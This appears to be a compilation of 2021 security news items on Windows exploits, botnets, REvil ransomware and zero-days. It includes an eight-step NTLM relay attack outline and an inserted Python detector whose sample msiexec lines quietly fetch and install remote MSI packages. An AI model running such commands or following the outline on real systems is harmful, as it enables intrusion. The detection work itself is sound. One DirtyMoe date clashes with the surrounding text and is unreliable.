"Last week, Chinese security firm QiAnXin published a low-quality GIF showing an exploit for the CVE-2021-1675 bug for the first time, but the company did not release any technical details or a working PoC in order to allow users more time to apply this month’s security updates and safeguard their systems," reports the Record. 

Bug Allows Remote Code Execution

The vulnerability was first classified as a low-importance elevation-of-privilege vulnerability that lets an attacker gain admin access. Last week, however, Microsoft changed its status and marked CVE-2021-1675 as a remote code execution problem that could be exploited remotely to let hackers fully compromise unpatched Windows devices. 

At first, no PoC or technical write-up was posted for CVE-2021-1675, which meant that hackers who wanted to exploit this vulnerability had to inspect the patch code themselves and create an exploit to integrate this bug into their cyberattacks.

DirtyMoe Botnet has Infected over 100,000 Windows Systems

 

More than 100,000 Windows systems have been infected with the DirtyMoe malware. According to cyber-security firm Avast, a Windows malware botnet thought to be managed out of China has surged this year, increasing from 10,000 infected systems in 2020 to more than 100,000 in the first half of 2021. The malware, which goes by the names DirtyMoe, PurpleFox, Perkiler, and NuggetPhantom, has been circulating since late 2017. 

Its main goal has been to infect Windows systems and mine cryptocurrency behind the users' backs, although the functionality to execute DDoS assaults was discovered in 2018. The botnet was a small-scale operation for the majority of its existence. Its authors mostly used email spam to get people to malicious websites that hosted the PurpleFox exploit kit. 

This web-based attack tool made use of browser vulnerabilities, most commonly in Internet Explorer, to install a rootkit component on unpatched Windows computers, giving the malware complete control over the affected host, which is then used for crypto-mining. This rootkit, also known as DirtyMoe, PurpleFox, Perkiler, and NuggetPhantom, was well-known in the cyber-security field, but it was only considered a minor threat. 

According to Avast, the DirtyMoe botnet had an annual average of a few hundred to a few thousand infected systems for the majority of its life from 2017 to 2020. Things changed dramatically near the end of 2021 when the DirtyMoe gang released an update to their operation that included a worm module that allowed the malware to spread across the internet to other Windows systems. “Recently, a new infection vector that cracks Windows machines through SMB password brute force is on the rise,” reads the analysis published by Avast. This module scanned the internet for remote Windows machines that had left their SMB port exposed online and launched password brute-force attacks against them. 

The malware's SMB propagation module allowed it to explode in terms of infections on a logarithmic scale, with over 100,000 systems affected this year alone, according to Avast. However, this figure is based solely on Avast's visibility—that is, PCs with the antivirus software installed. The true magnitude of the DirtyMoe botnet is thought to be far larger. 

A report from Tencent, a Chinese security firm, detected an increase in DirtyMoe/PurpleFox infections in China over the course of 2021, reflecting the comparable explosion in infection numbers reported by Avast in Europe, Asia, and America at the start of the month.

Hackers Take Advantage of Adobe Zero-Day Vulnerability Impacting Acrobat Reader

 

A patch for Adobe Acrobat, the world's most popular PDF reader, addresses a vulnerability that has been actively exploited and affects both Windows and macOS systems, allowing for arbitrary code execution. 

Adobe is advising customers about a crucial zero-day vulnerability in its widely used Adobe Acrobat PDF reader software that is being actively exploited in the wild. As part of Adobe's Tuesday roundup of 43 fixes for 12 of its products, including Adobe Creative Cloud Desktop Application, Illustrator, InDesign, and Magento, a patch is now available. 

According to Adobe, the CVE-2021-28550 zero-day vulnerability "has been exploited in the wild in selective attacks targeting Adobe Reader users on Windows." Adobe Reader users on Windows may be the only ones currently being targeted. The bug, however, affects eight different versions of the software, including those for Windows and Mac. The versions include:

1. Windows Acrobat DC & Reader DC (versions 2021.001.20150 and earlier)
2. macOS Acrobat DC & Reader DC (versions 2021.001.20149 and earlier)
3. Windows & macOS Acrobat 2020 & Acrobat Reader 2020 (2020.001.30020 and earlier versions)
4. Windows & macOS Acrobat 2017 & Acrobat Reader 2017 (2017.011.30194 and earlier versions)

Adobe did not have any technical details about the zero-day flaw. Those details are usually available after users have had a chance to apply the patch. Users can manually update their product installations by going to Help > Check for Updates, according to Adobe's May security bulletin, which was released on Tuesday. 

Several other important bugs were included in Tuesday's roundup of 43 fixes. Adobe Acrobat received a total of ten crucial and four significant vulnerability patches. A total of seven of the bugs were arbitrary code execution bugs. Three of the vulnerabilities patched on Tuesday (CVE-2021-21044, CVE-2021-21038, and CVE-2021-21086) expose systems to out-of-bounds write attacks. 

On Tuesday, Adobe Illustrator got the highest number of patches, with five critical code execution vulnerabilities patched. Three of the flaws (CVE-2021-21103, CVE-2021-21104, and CVE-2021-21105), according to Adobe's definition, are memory corruption bugs that enable hackers to execute arbitrary code on targeted systems. The three memory corruption bugs were discovered by Kushal Arvind Shah, a bug-hunter with Fortinet's FortiGuard Labs.

Threat Actors Use Several New Advanced Techniques To Exploit Windows Services


 

According to cybersecurity researchers, attackers are using several new and comparatively advanced techniques that exploit legitimate Windows services to escalate low-level privileges and gain full control of the system. (Least privilege, the concept and practice of restricting access rights for users, accounts, and computing processes to only those resources required to perform routine, legitimate activities, is also a foundational component of zero trust strategies.) 

In these recent attacks, the threat actors take advantage of the same Windows services that previous attacks targeted. Meanwhile, threat actors are also working on new techniques to gain access on recent versions of the operating system, as reported by Antonio Cocomazzi, a system engineer at SentinelOne, who discussed the topic at the Black Hat Asia virtual conference this week. 

For organizations, the biggest issue in dealing with these attacks is that they exploit services that are an important part of the system and exist by design in the Windows operating system. These services are enabled and available by default, and they play an essential part in the implementation of web networking, mail servers, database servers, and other important services. 

Exploits known as “Juicy Potato” have become a mainstream method for threat actors to break into Windows systems, said Cocomazzi. He added that SentinelOne has found specific evidence that the exploit is being used in multiple APT campaigns. 

“Microsoft has fixed the exploit in newer versions of its software. However, JuicyPotato still works on every updated Windows Server until version 2016 and on every updated Windows Client machine until version 10, build 1803. Additionally, newer versions of the so-called Potato family of exploits — such as RoguePotato and Juicy 2 — are now available that bypass the Microsoft fix that shut down JuicyPotato.” Antonio Cocomazzi, a system engineer at SentinelOne reported. 

NTLM Relay Attack Exploits Windows RPC Flaws

 

Security researchers at SentinelLabs revealed the details of a newly identified NTLM (New Technology LAN Manager) relay attack that exploits a remote procedure call (RPC) flaw to enable elevation of privilege.

This new vulnerability in RPC, which apparently impacts all versions of Windows, enables an attacker to escalate privileges from User to Domain Admin, all without requiring interaction from the user (NTLM relay attacks typically do require user intervention). 

The researchers used a DCOM client that was instructed to connect to an RPC server, an operation that involved two NTLM authentications, one without the sign flag being set. They also leveraged the fact that the DCOM activation service can be abused to trigger RPC authentication. 

According to SentinelLabs, the motive behind the attack was that a shell in Session 0, even as a low privileged user, combined with triggering some CLSIDs, could allow the attacker to obtain “an NTLM authentication from the user who is interactively connected.”

Methodology used by cybercriminals 

1. The threat actor has a shell in Session 0 on the target machine, even with a low-privilege account.
2. A user with high privileges (such as Domain Admin) logs in interactively.
3. The attacker triggers the DCOM activation service to impersonate the high-privileged user.
4. The attacker implements a man-in-the-middle to receive an authenticated call.
5. The binding of the RPC under the attacker’s control takes place.
6. The victim machine makes an authenticated call.
7. The authentication is relayed to a privileged resource such as LDAP, SMB, HTTP or other.
8. Lastly, the authentication is forwarded for privilege escalation.

Researchers at SentinelLabs also published proof-of-concept code to demonstrate how the exploit works, and revealed that, although Microsoft has acknowledged the vulnerability, a patch won’t be released. The researchers, however, did publish a series of mitigations that should help prevent attacks that would trigger an authenticated RPC/DCOM call and then relay the NTLM authentication. 

“This is different from other known techniques such as CVE-2020-1113 and CVE-2021-1678, where relaying happens between a generic ‘client’ protocol vs. an RPC server. In this case, we had an RPC client whose authentication was relayed to other ‘server’ protocols and without ‘victim’ interaction. Therefore, we hope that MS reconsider their decision not to fix this serious vulnerability,” SentinelLabs concludes.

New REvil Ransomware Version Automatically Logs Windows into Safe Mode

 

The REvil Ransomware is unstoppable when it comes to ingenious hacking tactics and techniques. The well-known ransomware has escalated its attack vector once again, this time by changing the victim's login password in order to reboot the computer into Windows Safe Mode. 

While malicious groups are constantly upgrading their attack strategies in order to fight security measures, the threat actors behind the REvil ransomware are especially skilled at honing their malware in order to make their attack campaigns more effective.

Last month, security researcher R3MRUM discovered a new sample of the REvil ransomware that improves the new Safe Mode encryption method by changing the logged-on user’s password and setting Windows to automatically log in on reboot. The ransomware updates the user's password to ‘DTrump4ever’ if the -smode argument is used. 

Afterward, the ransomware configures the following Registry values for Windows to automatically log in with the new account information. It is currently unknown whether new REvil ransomware encryptor samples will continue to use the ‘DTrump4ever' password, but at least two samples submitted to VirusTotal in the last two days have done so. 

This latest strategy exemplifies how ransomware groups are actively refining their tactics in order to effectively encrypt users' devices and demand a ransom payment. 

Asteelflash, a world-leading French EMS company, confirmed last week that it has been the target of a cybersecurity incident, identifying the involvement of REvil ransomware. After initially setting the ransom at $12 million in Monero crypto, the attackers demanded Asteelflash pay a whopping $24 million ransom. However, as the negotiations didn’t reach a point of agreement in time, the actors raised the ransom to double the amount and leaked the first sample of the exfiltrated files. 

Acer, a computer manufacturer, was also hit by the REvil ransomware. REvil has demanded a ransom of $50 million, which may be the highest ever demanded ransom.

REvil has introduced a service that contacts news media and companies to apply maximum pressure at no cost, along with DDoS (L3, L7) as a paid service. Threat actors, or associated partners, will perform voice-scrambled VoIP calls to the media and the victim’s business partners with information about the attack.

New Worm Capabilities Targets Windows Machines

 

Malware that has verifiably targeted exposed Windows machines through phishing and exploit kits has been retooled to add new "worm" capabilities. Purple Fox, which first appeared in 2018, is an active malware campaign that until recently required user interaction or some kind of third-party tool to infect Windows machines. However, the attackers behind the campaign have now upped their game and added new functionality that lets it force its way into victims' systems on its own, according to new Tuesday research from Guardicore Labs.

“Guardicore Labs have identified a new infection vector of this malware where internet-facing Windows machines are being breached through SMB password brute force,” Guardicore Labs' Amit Serper said. In addition to these new worm abilities, Purple Fox malware now also incorporates a rootkit that lets the threat actors conceal the malware on the machine and makes it hard to detect and remove, he said. 

Researchers examined Purple Fox's most recent activity and discovered two significant changes to how attackers are spreading malware on Windows machines. The first is that the new worm payload executes after a victim machine is compromised through a vulnerable exposed service. Purple Fox is also using an earlier tactic to infect machines through a phishing campaign, sending the payload by email to exploit a browser vulnerability, researchers observed. When the worm infects a victim's machine, it creates a new service to establish persistence and execute a simple command that can iterate through a number of URLs that include the MSI for installing Purple Fox on a compromised machine, said Serper. 

“msiexec will be executed with the /i flag, in order to download and install the malicious MSI package from one of the hosts in the statement,” he explained. “It will also be executed with the /Q flag for ‘quiet’ execution, meaning, no user interaction will be required.”
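The flag combination Serper describes (an install with /i from a remote host plus /Q for quiet execution) can be matched in process-creation logs. The following is an added detection example, not code from Guardicore or the original post; the command lines are constructed, the hosts use documentation-only addresses, and the function names are hypothetical.

```python
import re

REMOTE = re.compile(r"^https?://", re.IGNORECASE)
SILENT_FLAGS = {"q", "qn", "quiet"}    # msiexec UI levels that show nothing to the user
INSTALL_FLAGS = {"i", "package"}       # both take the package path or URL as next token

# Constructed process-creation command lines, not taken from any real host.
SAMPLE_EVENTS = [
    r"msiexec /i http://203.0.113.10:8080/pkg.msi /Q",
    r'"C:\Windows\System32\msiexec.exe" /q /I https://example.test/a.msi',
    r"cmd.exe /c msiexec -i HTTP://198.51.100.7/x.msi -quiet",
    r"msiexec.exe /i C:\Installers\agent.msi /qn",          # local package, quiet
    r"msiexec /i https://example.test/setup.msi",            # remote, but interactive
    r"msiexec /x {11111111-2222-3333-4444-555555555555} /quiet",  # uninstall
]


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted runs together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def analyze(cmdline):
    """Describe the msiexec call found in cmdline, or return None if there is none."""
    tokens = tokenize(cmdline)
    for pos, tok in enumerate(tokens):
        if re.split(r"[\\/]", tok)[-1].lower() in ("msiexec", "msiexec.exe"):
            break
    else:
        return None
    args = tokens[pos + 1:]
    package, silent = None, False
    for i, arg in enumerate(args):
        if not arg.startswith(("/", "-")):
            continue
        flag = arg[1:].lower()       # msiexec flags are case-insensitive
        if flag in SILENT_FLAGS:
            silent = True
        elif flag in INSTALL_FLAGS and i + 1 < len(args):
            package = args[i + 1]
    remote = bool(package and REMOTE.match(package))
    return {"package": package, "remote": remote, "silent": silent,
            "alert": remote and silent}


def find_alerts(events):
    """Return the command lines that install a remote MSI with no UI."""
    hits = []
    for line in events:
        result = analyze(line)
        if result and result["alert"]:
            hits.append(line)
    return hits


if __name__ == "__main__":
    for hit in find_alerts(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

Quiet installs of local packages are routine in managed environments, so the rule alerts only when the quiet flag and a remote package source appear together.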

Devices caught in this botnet include Windows Server machines running IIS version 7.5 and Microsoft FTP, and servers running Microsoft RPC, Microsoft SQL Server 2008 R2, Microsoft HTTPAPI httpd 2.0, and Microsoft Terminal Service.

Hackers used 11 Zero-Days to Attack Windows, iOS, Android Users

 

Malware trackers at Google continue to call attention to a sophisticated APT group that burned through at least 11 zero-day exploits in less than a year to conduct mass spying across a range of platforms and devices. The group has effectively used "watering hole" attacks to redirect specific targets to a pair of exploit servers delivering malware on Windows, iOS, and Android devices. 

The cross-platform capabilities and the willingness to use almost a dozen zero-days in under a year signal a well-resourced threat actor with the ability to access hacking tools and exploits from related groups. In another blog post, Google Project Zero researcher Maddie Stone released additional details on the exploit chains found in the wild last October and cautioned that the most recent disclosure is tied to a February 2020 campaign that included the use of multiple zero-days. According to Stone, the threat actor from the February 2020 campaign went dark for a couple of months but returned in October with dozens of websites redirecting to an exploit server. 

“Once our analysis began, we discovered links to a second exploit server on the same website. After initial fingerprinting (appearing to be based on the origin of the IP address and the user-agent), an iframe was injected into the website pointing to one of the two exploit servers. In our testing, both of the exploit servers existed on all of the discovered domains,” Stone explained. 

The first exploit server initially responded only to Apple iOS and Microsoft Windows user-agents and was active for at least a week after Google's researchers began retrieving the hacking tools. This server included exploits for a remote code execution bug in the Google Chrome rendering engine and a v8 zero-day after the underlying bug was fixed. Stone said the first server briefly responded to Android user-agents, suggesting exploits existed for every one of the major platforms.

Stone noted that the attackers used a special obfuscation and anti-analysis check on iOS devices where those exploits were encrypted with ephemeral keys, “meaning that the exploits couldn't be recovered from the packet dump alone, instead of requiring an active MITM on our side to rewrite the exploit on-the-fly.”